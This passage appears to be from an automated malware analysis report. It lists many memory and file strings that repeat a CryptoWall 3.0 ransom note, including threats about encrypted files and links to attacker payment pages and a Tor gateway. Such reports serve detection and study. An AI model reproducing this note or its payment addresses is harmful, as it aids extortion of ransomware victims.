for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt286.2.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html132.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt190.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt195.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html345.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html254.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt115.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html78.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt337.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html281.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html260.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt178.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html134.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html87.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt53.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt234.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt108.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html65.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html13.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt197.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html291.2.dr, String found in binary or memory: identical ransom-note HTML to the restore_files_gpmus.html45.2.dr entry above
Source: restore_files_gpmus.txt203.2.dr, String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html305.2.dr, String found in binary or memory: identical ransom-note HTML to the restore_files_gpmus.html45.2.dr entry above
Source: restore_files_gpmus.html114.2.dr, String found in binary or memory: identical ransom-note HTML to the restore_files_gpmus.html45.2.dr entry above
Source: restore_files_gpmus.txt345.2.dr, String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt208.2.dr, String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html52.2.dr, String found in binary or memory: identical ransom-note HTML to the restore_files_gpmus.html45.2.dr entry above
Source: restore_files_gpmus.html188.2.dr, String found in binary or memory: identical ransom-note HTML to the restore_files_gpmus.html45.2.dr entry above
Source: restore_files_gpmus.html243.2.dr, String found in binary or memory: identical ransom-note HTML to the restore_files_gpmus.html45.2.dr entry above
Source: restore_files_gpmus.html126.2.dr, String found in binary or memory: identical ransom-note HTML to the restore_files_gpmus.html45.2.dr entry above
Source: restore_files_gpmus.txt246.2.dr, String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html167.2.dr, String found in binary or memory: identical ransom-note HTML to the restore_files_gpmus.html45.2.dr entry above
Source: restore_files_gpmus.txt326.2.dr, String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html79.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
